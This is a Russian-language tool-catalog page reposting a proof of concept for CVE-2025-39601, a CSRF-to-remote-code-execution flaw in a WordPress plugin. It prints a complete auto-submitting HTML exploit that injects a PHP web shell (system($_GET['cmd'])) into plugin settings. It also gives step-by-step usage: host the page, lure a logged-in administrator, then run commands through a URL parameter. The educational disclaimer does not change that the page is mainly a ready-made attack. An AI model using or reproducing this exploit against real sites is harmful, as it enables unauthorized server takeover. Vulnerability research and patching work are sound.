Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-39601 — Плагин WordPress Custom CSS, JS & PHP <= 2.4.1 - уязвимость CSRF to RCE | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-39601
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2025-39601

CVE-2025-39601

Плагин WordPress Custom CSS, JS & PHP <= 2.4.1 - уязвимость CSRF to RCE

Репозиторий
151 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 CVE-2025-39601 - CSRF к RCE в плагине Custom CSS, JS & PHP для WordPress <= 2.4.1

🧠 Описание

Уязвимость Межсайтовой подделки запроса (CSRF) в плагине WPFactory Custom CSS, JS & PHP позволяет выполнить удаленное выполнение кода (RCE) путем внедрения вредоносного PHP-кода через неавторизованные POST-запросы.
Это затрагивает все версии до 2.4.1 включительно.

  • CVE ID: CVE-2025-39601
  • Опубликовано: 2025-04-16
  • Обновлено: 2025-04-16
  • Серьезность: 🔥 9.6 (КРИТИЧЕСКИЙ)
  • CWE: CWE-352 - Межсайтовая подделка запроса
  • CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🖼️ Визуальное подтверждение

Ниже приведен скриншот, показывающий результат успешной эксплуатации, демонстрирующий, как удаленный код может быть выполнен через параметр URL:

Nxploited


Nxploited


💥 Доказательство концепции (PoC)

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability</title>
</head>
<body onload="document.forms[0].submit()">
    <h1>CSRF PoC - WordPress Custom CSS, JS & PHP plugin <= 2.4.1</h1>
    <p>By : Nxploited | Khaled Alenazi</p>
    <form action="http://192.168.100.74:888/wordpress4/wp-admin/tools.php?page=alg-custom-php" method="POST">
        <input type="hidden" name="alg_custom_css_php_enabled" value="1">
        <input type="hidden" name="alg_custom_css_php_execute" value="plugins_loaded">
        <input type="hidden" name="alg_custom_css_php" value="<?php system($_GET['cmd']); ?>">
        <input type="hidden" name="alg_ccjp_submit" value="php">
        <noscript><input type="submit" value="Submit"></noscript>
    </form>
</body>
</html>

🧪 Использование

  1. Разместите приведенный выше HTML-файл на любом внешнем сервере или в локальной среде.
  2. Пока администратор вошел в систему, посетите размещенный HTML-файл в его браузере.
  3. Это незаметно отправит форму и внедрит PHP-код в настройки плагина.
  4. Затем код автоматически выполняется при каждой загрузке страницы через хук plugins_loaded.
  5. Пример выполнения:
    root@kitploit:~
    http://target-site.com/?cmd=whoami
    

⚠️ Отказ от ответственности

Данный PoC предназначен только для образовательных целей.
Автор не несет ответственности за любое неправомерное использование или ущерб, вызванный неправильным применением этой информации.
Всегда тестируйте в контролируемых средах и с разрешения.


Автор: Nxploited | Khaled Alenazi

Скачать инструмент